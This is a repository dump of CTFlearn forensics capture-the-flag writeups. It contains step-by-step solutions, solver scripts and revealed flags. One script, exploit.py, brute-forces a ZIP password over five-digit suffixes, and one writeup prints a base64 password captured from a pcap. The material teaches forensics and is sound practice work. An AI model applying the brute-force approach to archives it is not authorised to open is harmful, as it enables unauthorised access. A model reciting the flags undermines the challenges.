2020 18 | 19 | 2 FILES EXTRACTED 20 | 21 | jpg:= 1 22 | zip:= 1 23 | ------------------------------------------------------------------ 24 | 25 | Foremost finished at Thu Sep 10 20:41:19 2020 26 | -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/jpg/00000000.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/jpg/00000000.jpg -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/00000012.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/zip/00000012.zip -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/exploit.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python3 2 | from zipfile import ZipFile 3 | from string import digits 4 | import itertools 5 | 6 | brute = itertools.product(digits,repeat=5) 7 | 8 | with ZipFile("00000012.zip") as zf: # Path to 00000012.zip to be mentioned 9 | for i in brute: 10 | i = ''.join(i) 11 | password = "ctflag" + i 12 | try: 13 | zf.extractall(pwd=bytes(password,'utf-8')) 14 | print("Flag: " + password) 15 | except: 16 | pass -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/flag.txt: -------------------------------------------------------------------------------- 1 | RkxBR3ttYXlfdGhlX2JydXRlX2ZvcmNlX2JlX3dpdGhfeW91fQ== -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Brute Force is Fun!/output/zip/flag.zip -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/folders/73/43/p: -------------------------------------------------------------------------------- 1 | Hmmm... almost! 2 | The password is: "ctflag*****" where * is a number. 3 | Encrypt the password using MD5 and compare it to the given hash! 4 | As I said, you're gonna have to brute force the password! 5 | Good luck! :) -------------------------------------------------------------------------------- /Forensics/Brute Force is Fun!/output/zip/folders/73/47/p: -------------------------------------------------------------------------------- 1 | Hmmm... almost! 2 | The password is: "ctflag*****" where * is a number. 3 | Encrypt the password using MD5 and compare it to the given hash! 4 | As I said, you're gonna have to brute force the password! 5 | Good luck! :) -------------------------------------------------------------------------------- /Forensics/Chalkboard/README.md: -------------------------------------------------------------------------------- 1 | ## Chalkboard 2 | The main idea finding the flag is to use strings. 3 | 4 | #### Step-1: 5 | After I downloaded `math.jpg`, I tried using `strings`, `binwalk`, etc. 6 | 7 | 8 | 9 | #### Step-2: 10 | When I gave input `strings math.jpg` 11 | 12 | Output: 13 | 14 | ``` 15 | JFIF 16 | The flag for this challenge is of the form: 17 | CTFlearn{I_Like_Math_x_y} 18 | where x and y are the solution to these equations: 19 | 3x + 5y = 31 20 | 7x + 9y = 59 21 | ... 22 | ``` 23 | 24 | #### Step-3: 25 | 26 | Just solved the equations to get `x = 2` & `y = 5`. 27 | 28 | #### Step-4: 29 | Finally the flag becomes: 30 | `CTFlearn{I_Like_Math_2_5}` 31 | -------------------------------------------------------------------------------- /Forensics/Chalkboard/math.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Chalkboard/math.jpg -------------------------------------------------------------------------------- /Forensics/Corrupted File/Edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/Edit.png -------------------------------------------------------------------------------- /Forensics/Corrupted File/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/Flag.png -------------------------------------------------------------------------------- /Forensics/Corrupted File/README.md: -------------------------------------------------------------------------------- 1 | ## Corrupted File 2 | The main idea finding the flag is get flag using manipulation in the header of GIF. 3 | 4 | #### Step-1: 5 | After I downloaded `unopenable.gif`, it is not accessible. When I checked online its hex dump, it differed from standard GIF header. 6 | 7 | #### Step-2: 8 | A standard GIF header should look like a Hex-Dump mentioned here: 9 | https://www.file-recovery.com/gif-signature-format.htm 10 | 11 | So, I edited the header accordingly: 12 | 13 | 14 | 15 | #### Step-3: 16 | After downloading the new `New.gif`, if we see the gif. It runs very fast. 17 | 18 | But we can see a Base64 encrypted text `ZmxhZ3tnMWZfb3JfajFmfQ==` 19 | 20 | I decoded it online at: https://www.base64decode.org/ 21 | 22 | 23 | 24 | #### Step-4: 25 | Finally the flag becomes: 26 | `flag{g1f_or_j1f}` 27 | -------------------------------------------------------------------------------- /Forensics/Corrupted File/unopenable.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/unopenable.gif -------------------------------------------------------------------------------- /Forensics/Corrupted File/unopenable1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Corrupted File/unopenable1.gif -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/Base64.png -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/README.md: -------------------------------------------------------------------------------- 1 | ## Digital Camouflage 2 | The main idea finding the flag is Network Interception and some Crytographic Techniques. 3 | 4 | #### Step-1: 5 | After downloading `data.pcap` from the cloud, I directly opened it in Wireshark. 6 | 7 | For those, who are unaware of how to use this tool for Network Interception, can refer here: 8 | https://www.wireshark.org/ 9 | 10 | I tried to check the Hex Dump, but couldn't find something special. 11 | 12 | #### Step-2: 13 | So, I tried to check the TCP stream in different frames. For those, who are unaware on how to do this: 14 | 15 | - Open `data.pcap` in Wireshark. 16 | - In the filters, put on TCP and then Enter to get all the TCP traffic of the network. 17 | 18 | - I wanted to check each and every frame as question is somewhat hinting in that direction, so to check that, Analyse -> Follow -> TCP Stream 19 | 20 | - We can alter streams by changing the counter in bottom right corner. 21 | - As I reached 3rd stream, I observed some credentials there. 22 | 23 | 24 | `userid=hardawayn&pswrd=UEFwZHNqUlRhZQ%3D%3D` 25 | #### Step-3: 26 | So, it is clear that password is Base64 encrypted and in web URLs, %3D is to be replaced by =. 27 | 28 | So I tried to decode the Base64 encryption online at: https://www.base64decode.org/ 29 | 30 | 31 | 32 | It had the flag in it. Voila. 33 | 34 | #### Step-4: 35 | Finally the flag becomes: 36 | `PApdsjRTae` -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/TCP_Stream.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream.png -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/TCP_Stream_Eq_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream_Eq_0.png -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/TCP_Stream_Eq_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/TCP_Stream_Eq_3.png -------------------------------------------------------------------------------- /Forensics/Digital Camouflage/data.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Digital Camouflage/data.pcap -------------------------------------------------------------------------------- /Forensics/Dumpster/Decryptor.java: -------------------------------------------------------------------------------- 1 | import java.security.MessageDigest; 2 | import java.util.Arrays; 3 | import java.util.Base64; 4 | 5 | import javax.crypto.Cipher; 6 | import javax.crypto.spec.SecretKeySpec; 7 | 8 | public class Decryptor 9 | { 10 | public static final String FLAG = "S+kUZtaHEYpFpv2ixuTnqBdORNzsdVJrAxWznyOljEo="; 11 | private static class Password 12 | { 13 | private byte[] passHash; 14 | 15 | public Password(char[] pass) throws Exception 16 | { 17 | MessageDigest digest = MessageDigest.getInstance("SHA-256"); 18 | this.passHash = Arrays.copyOf(digest.digest(new String(pass).getBytes("UTF-8")), 16); 19 | } 20 | 21 | public byte[] encrypt(byte[] msg) throws Exception 22 | { 23 | SecretKeySpec spec = new SecretKeySpec(passHash, "AES"); 24 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); 25 | cipher.init(Cipher.ENCRYPT_MODE, spec); 26 | return cipher.doFinal(msg); 27 | } 28 | 29 | public byte[] decrypt(byte[] msg) throws Exception 30 | { 31 | SecretKeySpec spec = new SecretKeySpec(passHash, "AES"); 32 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); 33 | cipher.init(Cipher.DECRYPT_MODE, spec); 34 | return cipher.doFinal(msg); 35 | } 36 | } 37 | 38 | public static void main(String[] args) throws Exception 39 | { 40 | Password pass = new Password(System.console().readPassword("Enter password to decrypt flag: ")); 41 | System.out.println(new String(pass.decrypt(Base64.getDecoder().decode(FLAG.getBytes())))); 42 | Thread.sleep(5000); //We did a heap dump right here. 43 | } 44 | } -------------------------------------------------------------------------------- /Forensics/Dumpster/README.md: -------------------------------------------------------------------------------- 1 | ## Dumpster 2 | The main idea finding the flag is Java coding. 3 | 4 | #### Step-1: 5 | I tried hard to understand the question and solve it, but I couldn't do it, so I had to look up for writeup. 6 | 7 | https://github.com/EladBeber/CTFlearn-Writeups/tree/master/Forensics/Medium/DUMPSTER 8 | 9 | #### Step-2: 10 | 11 | Finally the flag becomes: 12 | `stCTF{h34p_6ump5_r_c00l!11!!}` -------------------------------------------------------------------------------- /Forensics/Dumpster/dumpster.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Dumpster/dumpster.zip -------------------------------------------------------------------------------- /Forensics/Dumpster/heapdump.hprof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Dumpster/heapdump.hprof -------------------------------------------------------------------------------- /Forensics/Exclusive Santa/Exclusive_Santa.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exclusive Santa/Exclusive_Santa.rar -------------------------------------------------------------------------------- /Forensics/Exclusive Santa/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exclusive Santa/Flag.png -------------------------------------------------------------------------------- /Forensics/Exclusive Santa/README.md: -------------------------------------------------------------------------------- 1 | ## Exclusive Santa 2 | The main idea finding the flag is using binwalk and Stegsolve. 3 | 4 | #### Step-1: 5 | After I downloaded `Exclusive_Santa.rar`, we have `1.png` & `3.png` in it. 6 | 7 | When I tried `binwalk 3.png`, I got other `zip` files in it. 8 | 9 | #### Step-2: 10 | So, when we extract those and then use Stegsolve with Image Combiner (basically XOR), we get the flag. 11 | 12 | 13 | 14 | #### Step-3: 15 | Finally the flag becomes: 16 | `CTFlearn{Santa_1s_C0ming}` -------------------------------------------------------------------------------- /Forensics/Exif/Computer-Password-Security-Hacker - Copy.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Exif/Computer-Password-Security-Hacker - Copy.jpg -------------------------------------------------------------------------------- /Forensics/Forensics 101/95f6edfb66ef42d774a5a34581f19052.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Forensics 101/95f6edfb66ef42d774a5a34581f19052.jpg -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/Flag.png -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/Gandalf.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/Gandalf.jpg -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/README.md: -------------------------------------------------------------------------------- 1 | ## GandalfTheWise 2 | The main idea finding the flag is XOR strings. 3 | #### Step-1: 4 | After downloading `Gandalf.jpg`, I tried `strings Gandalf.jpg` and got this output. These are initial strings embedded in Meta data of image. 5 | 6 | ``` 7 | JFIF 8 | +Q1RGbGVhcm57eG9yX2lzX3lvdXJfZnJpZW5kfQo= 9 | +xD6kfO2UrE5SnLQ6WgESK4kvD/Y/rDJPXNU45k/p 10 | +h2riEIj13iAp29VUPmB+TadtZppdw3AuO7JRiDyU 11 | ... 12 | ``` 13 | 14 | #### Step-2: 15 | I decrypted the 1st Base64 encrypted string i.e. `Q1RGbGVhcm57eG9yX2lzX3lvdXJfZnJpZW5kfQo=` at https://cryptii.com/. 16 | 17 | 18 | 19 | It gives a false flag `CTFlearn{xor_is_your_friend}`, but on a brighter side it gives idea of XOR'ing the next 2 strings. 20 | 21 | #### Step-3: 22 | So, I decrypted remaining 2 strings to get hexadecimal texts because in that [RFC](https://datatracker.ietf.org/doc/html/rfc5987), ASCII text isn't possible. 23 | 24 | 25 | 26 | 27 | 28 | 29 | #### Step-4: 30 | I XOR them online at: http://xor.pw/ to get the flag. 31 | 32 | 33 | 34 | #### Step-5: 35 | Finally the flag becomes: 36 | 37 | 38 | [comment]: <> (`CTFlearn{Gandalf.BilboBaggins}`) 39 | -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/String1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String1.png -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/String2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String2.png -------------------------------------------------------------------------------- /Forensics/GandalfTheWise/String3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/GandalfTheWise/String3.png -------------------------------------------------------------------------------- /Forensics/Git Is Good/gitIsGood.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Git Is Good/gitIsGood.zip -------------------------------------------------------------------------------- /Forensics/Git Is Good/gitIsGood/flag.txt: -------------------------------------------------------------------------------- 1 | flag{REDACTED} 2 | -------------------------------------------------------------------------------- /Forensics/HailCaesar!/Base64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/Base64.png -------------------------------------------------------------------------------- /Forensics/HailCaesar!/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/Flag.png -------------------------------------------------------------------------------- /Forensics/HailCaesar!/HailCaesar.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/HailCaesar!/HailCaesar.jpg -------------------------------------------------------------------------------- /Forensics/I'm a dump/file: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/I'm a dump/file -------------------------------------------------------------------------------- /Forensics/Jakarta/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/Flag.png -------------------------------------------------------------------------------- /Forensics/Jakarta/Jakarta.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/Jakarta.jpg -------------------------------------------------------------------------------- /Forensics/Jakarta/jakarta.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from jakarta_data import * 3 | 4 | parts = [] 5 | data = bytes(data) 6 | parts = data.split(b'\xff\xd9')[:-1] 7 | 8 | for i in range(len(parts)): 9 | print(i, parts[i][:16], '...', parts[i][-16:], len(parts[i])) 10 | 11 | jpg = open('Jakarta.jpg', 'rb').read() 12 | rsa_prefix = b'-----BEGIN RSA PRIVATE KEY-----' 13 | xord_offset = 0 14 | for r in range(0, len(parts[0]), len(rsa_prefix)): 15 | xor_bytes = [] 16 | for i in range(len(rsa_prefix)): 17 | xor_bytes.append(rsa_prefix[i]^parts[0][r+i]) 18 | 19 | a = jpg.find(bytes(xor_bytes)) 20 | if a != -1: 21 | print('found', a, r) 22 | xord_offset = a 23 | break 24 | 25 | with open('jakarta_rsa.key', 'wb') as fd: 26 | for i in range(len(parts[0])): 27 | fd.write(int.to_bytes(parts[0][i] ^ jpg[xord_offset+i], 1, 'little')) 28 | 29 | with open('jakarta_flag', 'wb') as fd: 30 | fd.write(parts[3]) 31 | -------------------------------------------------------------------------------- /Forensics/Jakarta/jakarta_data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/jakarta_data.png -------------------------------------------------------------------------------- /Forensics/Jakarta/jakarta_flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Jakarta/jakarta_flag -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/a: -------------------------------------------------------------------------------- 1 | 2 | 3 | This is not the flag you are looking for. -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/b.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/_oreo.jpg.extracted/1/b.jpg -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/_oreo.jpg.extracted/252B.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/_oreo.jpg.extracted/252B.rar -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/b.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/b.jpg -------------------------------------------------------------------------------- /Forensics/Milk's Best Friend/oreo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Milk's Best Friend/oreo.jpg -------------------------------------------------------------------------------- /Forensics/Minions/Hey_You.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/Hey_You.png -------------------------------------------------------------------------------- /Forensics/Minions/Only_Few_Steps.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/Only_Few_Steps.jpg -------------------------------------------------------------------------------- /Forensics/Minions/YouWon(Almost).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/YouWon(Almost).png -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/0 -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/5B: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/5B -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/5B-0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/5B-0 -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/D3EDB: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Hey_You.png.extracted/D3EDB -------------------------------------------------------------------------------- /Forensics/Minions/_Hey_You.png.extracted/You_Still_Here/Nothing_Here_16/..txt: -------------------------------------------------------------------------------- 1 | https://mega.nz/file/wZw2nAhS#i3Q0r-R8psiB8zwUrqHTr661d8FiAS1Ott8badDnZko -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/0 -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/1AA: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/1AA -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/1E: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/1E -------------------------------------------------------------------------------- /Forensics/Minions/_Only_Few_Steps.jpg.extracted/22806: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Minions/_Only_Few_Steps.jpg.extracted/22806 -------------------------------------------------------------------------------- /Forensics/MountainMan/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/Flag.png -------------------------------------------------------------------------------- /Forensics/MountainMan/Hexdump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/Hexdump.png -------------------------------------------------------------------------------- /Forensics/MountainMan/MountainMan.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/MountainMan/MountainMan.jpg -------------------------------------------------------------------------------- /Forensics/Mr.Bin/600x600_picture: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/600x600_picture -------------------------------------------------------------------------------- /Forensics/Mr.Bin/D0F0.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/D0F0.zip -------------------------------------------------------------------------------- /Forensics/Mr.Bin/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/bin -------------------------------------------------------------------------------- /Forensics/Mr.Bin/binwalk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/binwalk.png -------------------------------------------------------------------------------- /Forensics/Mr.Bin/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | data = open('bin', 'rb').read() 3 | 4 | w = 600 5 | 6 | with open('600x600_picture', 'wb') as fd: 7 | for i in range(0, len(data), w): 8 | if data[i] == 0x10: break 9 | if b'1' in data[i:i+w]: 10 | fd.write(data[i+200:i+364]) 11 | fd.write(b'\n') 12 | -------------------------------------------------------------------------------- /Forensics/Mr.Bin/image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/image.jpg -------------------------------------------------------------------------------- /Forensics/Mr.Bin/password.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Mr.Bin/password.png -------------------------------------------------------------------------------- /Forensics/Music To My Ears/README.md: -------------------------------------------------------------------------------- 1 | ## Music To My Ears 2 | The main idea finding the flag using faad-faac tool to fix the corrupted m4a files. 3 | 4 | #### Step-1: 5 | After we download `hereisyourflag.m4a` from the cloud, we try to open it but it doesn't help much. We come to know to know that it is corrupted during encoding. 6 | 7 | #### Step-2: 8 | While searching for ways to reverse the corrupted `.m4a` files, I came across this [article](https://sysfrontier.com/en/2014/12/31/hello-world/). This way uses a tool called [faad](http://rarewares.org/aac-decoders.php)-[faac](http://rarewares.org/aac-encoders.php) combination. 9 | 10 | #### Step-3: 11 | Finally the flag becomes: 12 | `flag{1_c4n_f1x_it}` -------------------------------------------------------------------------------- /Forensics/Music To My Ears/hereisyourflag.m4a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Music To My Ears/hereisyourflag.m4a -------------------------------------------------------------------------------- /Forensics/Naughty Cat/README.md: -------------------------------------------------------------------------------- 1 | ## Naughty Cat 2 | The main idea to find the flag is to use advanced Forensics Techniques. 3 | 4 | #### Step-1: 5 | We are given `cut3_c4t.png`. 6 | 7 | 8 | 9 | #### Step-2: 10 | I referred this to get the idea on how to solve: https://github.com/SanketBaraiya/CTFlearn-Solutions/tree/main/Naughty%20Cat 11 | 12 | #### Step-3: 13 | Finally, the flag becomes: 14 | `f0r3n51cs_ma5t3r` -------------------------------------------------------------------------------- /Forensics/Naughty Cat/cut3_c4t.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Forensics/Naughty Cat/cut3_c4t.png -------------------------------------------------------------------------------- /Forensics/PDF by fdpumyp/README.md: -------------------------------------------------------------------------------- 1 | ## PDF by fdpumyp 2 | The main idea to find the flag is to use strings and basic crypto recon. 3 | 4 | #### Step-1: 5 | We are given the document `dontopen.pdf`. 6 | 7 | #### Step-2: 8 | When we do a `strings dontopen.pdf`, we get the following output: 9 | ```bash 10 | ... 11 | == SECRET DATA DONT LOOK AT THIS == 12 | external:Q1RGbGVhcm57KV8xbDB3M3kwVW0wMG15MTIzfQ== 13 | pin:1234 14 | password:MTIzMVdST05HOWlzamRuUEFTU1dPUkQ= 15 | endstream 16 | endobj 17 | xref 18 | 0000149877 00000 n 19 | 13 1 20 | 0000150079 00000 n 21 | trailer 22 | <> 23 | startxref 24 | 150295 25 | %%EOF 26 | ``` 27 | 28 | #### Step-3: 29 | I decoded that key using `echo Q1RGbGVhcm57KV8xbDB3M3kwVW0wMG15MTIzfQ== | base64 -d`. 30 | 31 | Voila, I got the flag. 32 | 33 | #### Step-4: 34 | Finally, the flag becomes: 35 | `CTFlearn{)_1l0w3y0Um00my123}` -------------------------------------------------------------------------------- /Forensics/PDF by fdpumyp/dontopen.pdf: -------------------------------------------------------------------------------- 